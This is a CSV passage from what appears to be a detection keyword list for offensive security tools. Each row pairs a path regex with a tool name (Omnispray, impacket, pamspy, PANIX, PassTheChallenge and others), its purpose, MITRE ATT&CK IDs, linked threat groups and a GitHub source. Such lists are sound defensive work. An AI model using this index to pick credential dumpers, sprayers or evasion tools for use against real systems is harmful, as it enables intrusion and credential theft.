"*/ovs-agent-version.nse*",".{0,1000}\/ovs\-agent\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9464"
"*/owa_enum_activesync.py*",".{0,1000}\/owa_enum_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9465"
"*/owa_spray_activesync.py*",".{0,1000}\/owa_spray_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9466"
"*/OWASP*",".{0,1000}\/OWASP.{0,1000}","offensive_tool_keyword","OWASP","resources and cheat sheet for web attacks techniques","T1190 - T1191 - T1192 - T1210 - T1590 - T1558","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Vulnerability Scanner","https://github.com/OWASP","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9467"
"*/owa-sprayed-creds.txt*",".{0,1000}\/owa\-sprayed\-creds\.txt.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","#linux","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","9468"
"*/owa-valid-users.txt*",".{0,1000}\/owa\-valid\-users\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#linux","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","9469"
"*/owneredit.py*",".{0,1000}\/owneredit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9470"
"*/p_cve-2014-9322.tar.gz*",".{0,1000}\/p_cve\-2014\-9322\.tar\.gz.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","9471"
"*/p292/Phant0m*",".{0,1000}\/p292\/Phant0m.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z","9472"
"*/p2p-conficker.nse*",".{0,1000}\/p2p\-conficker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9473"
"*/package/portscan/*.go",".{0,1000}\/package\/portscan\/.{0,1000}\.go","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","9474"
"*/PackMyPayload.git*",".{0,1000}\/PackMyPayload\.git.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","9475"
"*/PackMyPayload/*",".{0,1000}\/PackMyPayload\/.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","9476"
"*/pacu.git*",".{0,1000}\/pacu\.git.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","9477"
"*/padre/pkg/exploit*",".{0,1000}\/padre\/pkg\/exploit.{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","1","N/A","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","9478"
"*/paensy.cpp*",".{0,1000}\/paensy\.cpp.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","9479"
"*/paloalto_enum_globalprotectportal.py*",".{0,1000}\/paloalto_enum_globalprotectportal\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9493"
"*/paloalto_spray_globalprotectportal.py*",".{0,1000}\/paloalto_spray_globalprotectportal\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9494"
"*/pamspy -p *",".{0,1000}\/pamspy\s\-p\s.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","9495"
"*/pamspy.git*",".{0,1000}\/pamspy\.git.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","9496"
"*/PANIX.git*",".{0,1000}\/PANIX\.git.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","1","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","9497"
"*/panix.sh --*",".{0,1000}\/panix\.sh\s\-\-.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","9498"
"*/papacat.bat",".{0,1000}\/papacat\.bat","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","9499"
"*/papacat.ps1*",".{0,1000}\/papacat\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","9500"
"*/papacat.zip*",".{0,1000}\/papacat\.zip.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","1","N/A","N/A","8","4","309","25","2024-08-21T23:10:08Z","2021-05-11T06:26:10Z","9501"
"*/paranoidninja/*",".{0,1000}\/paranoidninja\/.{0,1000}","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","N/A","10","10","193","66","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z","9502"
"*/Parasite Invoke.exe*",".{0,1000}\/Parasite\sInvoke\.exe.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","9503"
"*/Parasite%20Invoke.exe",".{0,1000}\/Parasite\%20Invoke\.exe","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","9504"
"*/Parasite-Invoke.git*",".{0,1000}\/Parasite\-Invoke\.git.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","9505"
"*/parrot/iso/*.iso*",".{0,1000}\/parrot\/iso\/.{0,1000}\.iso.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9506"
"*/parrot-mirror/*",".{0,1000}\/parrot\-mirror\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9507"
"*/parrot-on-docker/*",".{0,1000}\/parrot\-on\-docker\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9508"
"*/parrotsec/*",".{0,1000}\/parrotsec\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9509"
"*/ParsedMalleableData.txt*",".{0,1000}\/ParsedMalleableData\.txt.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","9510"
"*/parsers/nessus.py*",".{0,1000}\/parsers\/nessus\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9511"
"*/pass_gen.pl*",".{0,1000}\/pass_gen\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","9512"
"*/PassDetective.git*",".{0,1000}\/PassDetective\.git.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","N/A","7","2","129","8","2024-06-19T10:39:39Z","2023-07-22T12:31:57Z","9513"
"*/passhash.sl*",".{0,1000}\/passhash\.sl.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","N/A","2","129","32","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z","9514"
"*/passive_sqli.txt*",".{0,1000}\/passive_sqli\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","9515"
"*/PassSpray.git*",".{0,1000}\/PassSpray\.git.{0,1000}","offensive_tool_keyword","PassSpray","Domain Password Spray","T1110.003 - T1078","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/PassSpray","1","1","N/A","N/A","10","1","7","3","2025-02-20T10:07:43Z","2023-11-16T13:35:49Z","9516"
"*/PassSpray.ps1*",".{0,1000}\/PassSpray\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","9517"
"*/PassSpray.ps1*",".{0,1000}\/PassSpray\.ps1.{0,1000}","offensive_tool_keyword","PassSpray","Domain Password Spray","T1110.003 - T1078","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/PassSpray","1","1","N/A","N/A","10","1","7","3","2025-02-20T10:07:43Z","2023-11-16T13:35:49Z","9518"
"*/PassTheCert.exe*",".{0,1000}\/PassTheCert\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","9519"
"*/PassTheCert.exe*",".{0,1000}\/PassTheCert\.exe.{0,1000}","offensive_tool_keyword","PassTheCert","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","PassTheCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9520"
"*/PassTheCert.exe*",".{0,1000}\/PassTheCert\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","PassTheCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9521"
"*/PassTheCert.exe*",".{0,1000}\/PassTheCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9522"
"*/PassTheCert.git*",".{0,1000}\/PassTheCert\.git.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","9523"
"*/PassTheChallenge.git*",".{0,1000}\/PassTheChallenge\.git.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","9524"
"*/PassTheChallenge/Constants.h*",".{0,1000}\/PassTheChallenge\/Constants\.h.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#linux","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","9525"
"*/PassTheChallenge/Protocol_h.h*",".{0,1000}\/PassTheChallenge\/Protocol_h\.h.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#linux","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","9526"
"*/PassTheChallenge/releases/download/*",".{0,1000}\/PassTheChallenge\/releases\/download\/.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","9527"
"*/passwd.py*",".{0,1000}\/passwd\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","#linux","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9528"
"*/passwd_tracer.c*",".{0,1000}\/passwd_tracer\.c.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","#linux","N/A","7","8","752","109","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z","9529"
"*/password.lst*",".{0,1000}\/password\.lst.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","9530"
